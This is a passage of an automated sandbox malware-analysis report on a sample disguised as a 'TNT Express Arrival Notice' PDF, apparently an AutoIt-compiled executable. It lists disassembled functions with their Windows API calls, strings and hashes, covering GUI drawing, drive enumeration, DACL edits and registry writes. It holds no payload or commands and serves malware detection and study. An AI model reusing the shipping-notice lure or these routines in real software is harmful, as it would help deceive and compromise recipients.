, xrefs: 00942FC5

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 17a111c43b18180e10ad3fa02946f3f17199b8c85e53f00a7bf4fe81fb763049
Instruction ID: 64ca3c2960316664ba41392079e08ab9f0ff8d88628d8467b6e17e63db92dd34
Opcode Fuzzy Hash: 17a111c43b18180e10ad3fa02946f3f17199b8c85e53f00a7bf4fe81fb763049
Instruction Fuzzy Hash: 4F027AB1910209AFDB14DF69CC89EAE7BB9FB49711F008159F915AB2A1CB70ED01DF60

Function 009570D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0095712F
GetSysColorBrush.USER32(0000000F), ref: 00957160
GetSysColor.USER32(0000000F), ref: 0095716C
SetBkColor.GDI32(?,000000FF), ref: 00957186
SelectObject.GDI32(?,?), ref: 00957195
InflateRect.USER32(?,000000FF,000000FF), ref: 009571C0
GetSysColor.USER32(00000010), ref: 009571C8
CreateSolidBrush.GDI32(00000000), ref: 009571CF
FrameRect.USER32(?,?,00000000), ref: 009571DE
DeleteObject.GDI32(00000000), ref: 009571E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00957230
FillRect.USER32(?,?,?), ref: 00957262
GetWindowLongW.USER32(?,000000F0), ref: 00957284

Part of subcall function 009573E8: GetSysColor.USER32(00000012), ref: 00957421
Part of subcall function 009573E8: SetTextColor.GDI32(?,?), ref: 00957425
Part of subcall function 009573E8: GetSysColorBrush.USER32(0000000F), ref: 0095743B
Part of subcall function 009573E8: GetSysColor.USER32(0000000F), ref: 00957446
Part of subcall function 009573E8: GetSysColor.USER32(00000011), ref: 00957463
Part of subcall function 009573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00957471
Part of subcall function 009573E8: SelectObject.GDI32(?,00000000), ref: 00957482
Part of subcall function 009573E8: SetBkColor.GDI32(?,00000000), ref: 0095748B
Part of subcall function 009573E8: SelectObject.GDI32(?,?), ref: 00957498
Part of subcall function 009573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009574B7
Part of subcall function 009573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009574CE
Part of subcall function 009573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009574DB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 50b214652381f547553bb7b654f7d3b70643017b0ad53311f47d36047e95d537
Instruction ID: 43eeb9a8c78c626b9e4e610f1471fc98dc87f96ad93b8b9fd1f7824b3b1f98e8
Opcode Fuzzy Hash: 50b214652381f547553bb7b654f7d3b70643017b0ad53311f47d36047e95d537
Instruction Fuzzy Hash: B9A1A1B201C301BFDB00DFA2EC48A5BBBA9FB49322F100A19F962961E1D774E945DB51

Function 008D8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 008D8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00916AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00916AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00916F43

Part of subcall function 008D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008D8BE8,?,00000000,?,?,?,?,008D8BBA,00000000,?), ref: 008D8FC5

SendMessageW.USER32(?,00001053), ref: 00916F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00916F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00916FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00916FB7

Strings

0, xrefs: 00916DCF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: ffb1a5a2333ea777ff84d72b8c4c788f297016dcb63b993f04fef92d651c7d8d
Instruction ID: 9613b8b9b612ed68c4ec3cc7a6431a715f0553b538d90424ff964af1df3f8215
Opcode Fuzzy Hash: ffb1a5a2333ea777ff84d72b8c4c788f297016dcb63b993f04fef92d651c7d8d
Instruction Fuzzy Hash: 4A129D34A09206DFDB25CF28D884BAAB7E9FB44301F14456AF585CB261CB31EC92DF91

Function 00942711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0094273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0094286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009428A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009428B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00942900
GetClientRect.USER32(00000000,?), ref: 0094290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00942955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00942964
GetStockObject.GDI32(00000011), ref: 00942974
SelectObject.GDI32(00000000,00000000), ref: 00942978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00942988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00942991
DeleteDC.GDI32(00000000), ref: 0094299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009429C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 009429DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00942A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00942A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00942A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00942A77
GetStockObject.GDI32(00000011), ref: 00942A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00942A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00942A97

Strings

DISPLAY, xrefs: 0094295A
AutoIt v3, xrefs: 009428F8
static, xrefs: 0094294F, 00942A71
msctls_progress32, xrefs: 00942A13

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 1bda36910a934c523a92933d227c33ca40a2bf2bb3a2982de3d2176f0d329022
Instruction ID: dc5f74b2bb8af6bc2abc4d5ceb55693dc310571228aa968aa2a7321ea8defb00
Opcode Fuzzy Hash: 1bda36910a934c523a92933d227c33ca40a2bf2bb3a2982de3d2176f0d329022
Instruction Fuzzy Hash: 7CB139B1A10215AFEB14DF69CC8AFAE7BB9FB48711F008119F915E7290D770E940DBA0

Function 00934ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00934AED
GetDriveTypeW.KERNEL32(?,0095CB68,?,\\.\,0095CC08), ref: 00934BCA
SetErrorMode.KERNEL32(00000000,0095CB68,?,\\.\,0095CC08), ref: 00934D36

Strings

CDROM, xrefs: 00934BFB
Virtual, xrefs: 00934CE5
RAID, xrefs: 00934CBB
ATA, xrefs: 00934C98
PhysicalDrive, xrefs: 00934B76
RAMDisk, xrefs: 00934BF4
ATAPI, xrefs: 00934C91
SAS, xrefs: 00934CC9
Fibre, xrefs: 00934CAD
Removable, xrefs: 00934C10, 00934C15
iSCSI, xrefs: 00934CC2
SSD, xrefs: 00934C4A
Network, xrefs: 00934C02
SCSI, xrefs: 00934C8A
SSA, xrefs: 00934CA6
Fixed, xrefs: 00934C09
Unknown, xrefs: 00934BED, 00934C83
MMC, xrefs: 00934CDE
SATA, xrefs: 00934CD0
FileBackedVirtual, xrefs: 00934CEC
USB, xrefs: 00934CB4
\\.\, xrefs: 00934B3F
1394, xrefs: 00934C9F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2addf9a7d273b0ebf0d039c4603481e4ab9c0aedd0c7c26308306e4369a14095
Instruction ID: b7bb29928bc6d352bf5609f2bd98ae7817a72a4d88f02ef7aa8796b6bba78c06
Opcode Fuzzy Hash: 2addf9a7d273b0ebf0d039c4603481e4ab9c0aedd0c7c26308306e4369a14095
Instruction Fuzzy Hash: AE6194306052059BCB14EF28C981EADB7B4EB44304F259459F886AF792DB39FD41DF41

Function 009573E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00957421
SetTextColor.GDI32(?,?), ref: 00957425
GetSysColorBrush.USER32(0000000F), ref: 0095743B
GetSysColor.USER32(0000000F), ref: 00957446
CreateSolidBrush.GDI32(?), ref: 0095744B
GetSysColor.USER32(00000011), ref: 00957463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00957471
SelectObject.GDI32(?,00000000), ref: 00957482
SetBkColor.GDI32(?,00000000), ref: 0095748B
SelectObject.GDI32(?,?), ref: 00957498
InflateRect.USER32(?,000000FF,000000FF), ref: 009574B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009574CE
GetWindowLongW.USER32(00000000,000000F0), ref: 009574DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00957554
InflateRect.USER32(?,000000FD,000000FD), ref: 00957572
DrawFocusRect.USER32(?,?), ref: 0095757D
GetSysColor.USER32(00000011), ref: 0095758E
SetTextColor.GDI32(?,00000000), ref: 00957596
DrawTextW.USER32(?,009570F5,000000FF,?,00000000), ref: 009575A8
SelectObject.GDI32(?,?), ref: 009575BF
DeleteObject.GDI32(?), ref: 009575CA
SelectObject.GDI32(?,?), ref: 009575D0
DeleteObject.GDI32(?), ref: 009575D5
SetTextColor.GDI32(?,?), ref: 009575DB
SetBkColor.GDI32(?,?), ref: 009575E5

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 0f8a734827b07272260d8f640854d3c97f736f14e1d2b56ae7b5c69387e13a59
Instruction ID: ac501979faa22a9c64d2dcf30f36393d38614ec56b5f752ba19ff44354158940
Opcode Fuzzy Hash: 0f8a734827b07272260d8f640854d3c97f736f14e1d2b56ae7b5c69387e13a59
Instruction Fuzzy Hash: C76170B2908318AFDF01DFA5DC49EAEBFB9EB08321F104115F915AB2A1D7749A40DB90

Function 00950FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00951128
GetDesktopWindow.USER32 ref: 0095113D
GetWindowRect.USER32(00000000), ref: 00951144
GetWindowLongW.USER32(?,000000F0), ref: 00951199
DestroyWindow.USER32(?), ref: 009511B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009511ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0095121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00951232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00951245
IsWindowVisible.USER32(00000000), ref: 009512A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009512BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009512D0
GetWindowRect.USER32(00000000,?), ref: 009512E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0095130E
GetMonitorInfoW.USER32(00000000,?), ref: 00951328
CopyRect.USER32(?,?), ref: 0095133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 009513AA

Strings

0, xrefs: 009510D3
tooltips_class32, xrefs: 009511E6
(, xrefs: 0095131B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 1e08f663b08a1e5b4b0d6c027eed55bd8a334b72a653bfd8710244c508dc59e8
Instruction ID: dc4aa590221fb7427138ea91e63aa7ce43e9a9f931c1e3bdfd7ddd35ac8f6b6a
Opcode Fuzzy Hash: 1e08f663b08a1e5b4b0d6c027eed55bd8a334b72a653bfd8710244c508dc59e8
Instruction Fuzzy Hash: 9CB17B71608341AFD704DF6AC885F6ABBE4FF84351F00891CF9999B2A1D771E849CB92

Function 00950241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009502E5
_wcslen.LIBCMT ref: 0095031F
_wcslen.LIBCMT ref: 00950389
_wcslen.LIBCMT ref: 009503F1
_wcslen.LIBCMT ref: 00950475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009504C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00950504

Part of subcall function 008DF9F2: _wcslen.LIBCMT ref: 008DF9FD

Part of subcall function 0092223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00922258
Part of subcall function 0092223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0092228A

Strings

ISSELECTED, xrefs: 009504DD
SELECTCLEAR, xrefs: 0095052D
VIEWCHANGE, xrefs: 00950675
SELECTINVERT, xrefs: 0095057E
GETSUBITEMCOUNT, xrefs: 00950384, 0095039F
GETTEXT, xrefs: 009503EC, 00950407
GETSELECTEDCOUNT, xrefs: 00950470, 0095048B
FINDITEM, xrefs: 00950627
SELECT, xrefs: 00950548
GETSELECTED, xrefs: 009505E1
GETITEMCOUNT, xrefs: 00950316, 00950337
DESELECT, xrefs: 0095059C
SELECTALL, xrefs: 00950515

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: cafaf6dda015a002f9900a5ae7df8f336b01f8a646ea2ddb9094e0e0ef4ee1b9
Instruction ID: e1c6c3a0bc1cb7ed6a9da09ded9bef17147e244e9334d2658cdb78d3c0c754a3
Opcode Fuzzy Hash: cafaf6dda015a002f9900a5ae7df8f336b01f8a646ea2ddb9094e0e0ef4ee1b9
Instruction Fuzzy Hash: 39E17C312082019FC724EF2AC55192AB7E6FFD8715F144A6DF8969B3A1DB30ED49CB42

Function 008D8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D8968
GetSystemMetrics.USER32(00000007), ref: 008D8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D899B
GetSystemMetrics.USER32(00000008), ref: 008D89A3
GetSystemMetrics.USER32(00000004), ref: 008D89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008D89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008D89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008D8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008D8A3C
GetClientRect.USER32(00000000,000000FF), ref: 008D8A5A
GetStockObject.GDI32(00000011), ref: 008D8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 008D8A81

Part of subcall function 008D912D: GetCursorPos.USER32(?), ref: 008D9141
Part of subcall function 008D912D: ScreenToClient.USER32(00000000,?), ref: 008D915E
Part of subcall function 008D912D: GetAsyncKeyState.USER32(00000001), ref: 008D9183
Part of subcall function 008D912D: GetAsyncKeyState.USER32(00000002), ref: 008D919D

SetTimer.USER32(00000000,00000000,00000028,008D90FC), ref: 008D8AA8

Strings

AutoIt v3 GUI, xrefs: 008D8A20

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d0ab012eb63c721a26369b666f5bce04b72c03fa233a04ff72d2d04f75965607
Instruction ID: ac3205c184e28c76e811f558a52fc77c146d46236ce428016c8a3a39b8332248
Opcode Fuzzy Hash: d0ab012eb63c721a26369b666f5bce04b72c03fa233a04ff72d2d04f75965607
Instruction Fuzzy Hash: 6DB18971A0430AEFDB14DFA9DC85BAE3BB5FB48315F10422AFA15E7290DB30A941DB51

Function 00920D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00921114
Part of subcall function 009210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 00921120
Part of subcall function 009210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 0092112F
Part of subcall function 009210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 00921136
Part of subcall function 009210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00920DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00920E29
GetLengthSid.ADVAPI32(?), ref: 00920E40
GetAce.ADVAPI32(?,00000000,?), ref: 00920E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00920E96
GetLengthSid.ADVAPI32(?), ref: 00920EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00920EB5
HeapAlloc.KERNEL32(00000000), ref: 00920EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00920EDD
CopySid.ADVAPI32(00000000), ref: 00920EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00920F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00920F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00920F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00920F6E
HeapFree.KERNEL32(00000000), ref: 00920F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00920F7E
HeapFree.KERNEL32(00000000), ref: 00920F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00920F8E
HeapFree.KERNEL32(00000000), ref: 00920F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00920FA1
HeapFree.KERNEL32(00000000), ref: 00920FA8

Part of subcall function 00921193: GetProcessHeap.KERNEL32(00000008,00920BB1,?,00000000,?,00920BB1,?), ref: 009211A1
Part of subcall function 00921193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00920BB1,?), ref: 009211A8
Part of subcall function 00921193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00920BB1,?), ref: 009211B7

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: efde4cf056a4c05af1c2a435e5b26a708bc96e034047d295e385f7c971df1afb
Instruction ID: aa8ff6fbf6a904af850fd0b3dcabb6b8e1b1dddbcebbd6a620c93544d8f13073
Opcode Fuzzy Hash: efde4cf056a4c05af1c2a435e5b26a708bc96e034047d295e385f7c971df1afb
Instruction Fuzzy Hash: 3F7168B290431AAFDF209FA5ED48BEEBBBCFF44311F048115F919A6196D7319A05CB60

Function 0094C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0094C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0095CC08,00000000,?,00000000,?,?), ref: 0094C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0094C5A4
_wcslen.LIBCMT ref: 0094C5F4
_wcslen.LIBCMT ref: 0094C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0094C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0094C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0094C84D
RegCloseKey.ADVAPI32(?), ref: 0094C881
RegCloseKey.ADVAPI32(00000000), ref: 0094C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0094C960

Strings

REG_MULTI_SZ, xrefs: 0094C6F5
REG_BINARY, xrefs: 0094C913
REG_EXPAND_SZ, xrefs: 0094C5CD
REG_QWORD, xrefs: 0094C8C3
REG_SZ, xrefs: 0094C644
REG_DWORD, xrefs: 0094C804

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

